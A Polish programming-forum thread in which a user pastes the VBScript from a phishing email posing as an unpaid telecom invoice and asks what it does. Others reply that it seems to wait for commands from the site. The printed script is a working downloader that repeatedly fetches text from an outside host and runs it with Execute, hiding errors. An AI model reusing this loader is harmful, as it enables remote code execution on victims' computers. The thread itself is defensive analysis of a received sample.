Email z fałszywą fakturą zawierającą plik .vba

pytanie zadane 22 grudnia 2018 w Bezpieczeństwo, hacking przez Burgonys Początkujący (440 p.)

Witam,

Otrzymałem dziś maila z rzekomo nieopłaconą fakturą, z czystej ciekawości otworzyłem go w txt, żeby zobaczyć co miał mi zrobić i skrypt wygląda następująco:

'3305

Dim ztVar, reresponse, zzz 
ztVar = 0 
zzz = ""
Function punkTest()
	'3305
	On Error Resume Next 
	Execute "" + reresponse + "" 
	'3305
End Function


Sub tankConnect()
	'3305
    On Error Resume Next
	Dim oXMLHTTP 
	Dim oStream 
	Dim oStrsdfeam
	Set oXMLHTTP = CreateObject("Microsoft.XMLHTTP") 
	oXMLHTTP.Open "Post", "https://blogersite.info", False 
	oXMLHTTP.Send 
	reresponse = oXMLHTTP.responseText	 
	punkTest() 
	'3305
End Sub

msgbox "3305"
While ztVar < 10
 	'3305
 call tankConnect() 
Wend

Wygląda na to, że wysyła tylko pusty obiekt na podany wyżej adres? Czy jest tutaj coś, czego nie widzę?

Dla potencjalnych przyszłych odbiorców mail zaczynał się od:

Pragniemy poinformować że odnotowaliśmy długu z tytułu usług telekomunikacyjnych

1 odpowiedź

odpowiedź 22 grudnia 2018 przez niezalogowany

Raczej nic tu niezwykłego nie ma, ale na stronie jest:

WScript.Sleep 8000

więc może po prostu jest to jakiś mechanizm , który czeka na komende ze strony?

...ale raczej zapomnieli go zaimplementować.

komentarz 22 grudnia 2018 przez Burgonys Początkujący (440 p.)

Hahaha, na to wygląda, dzięki za odpowiedź

komentarz 22 grudnia 2018 przez Tomek Sochacki Ekspert (227,510 p.)

@Wojciech Radtke, swoją drogą to w ostnim czasie coraz więcej tego... ja chyba wpadłem na jakąś dziwną listę mailową bo nie ma tygodnia abym nie dostał 1-2 takich "faktur"... różne, vba, js, pdf... :)

komentarz 22 grudnia 2018 przez niezalogowany

Ja takich nie dostaje )-: a chciałbym. Nawet mam konto, na którym rejstruje sie z tym samym hasłem na wielu dziwnych stronach... i nic. Tak swoją drogą to jestem ciekaw dlaczego większość tych maili łatwo da się wykryć.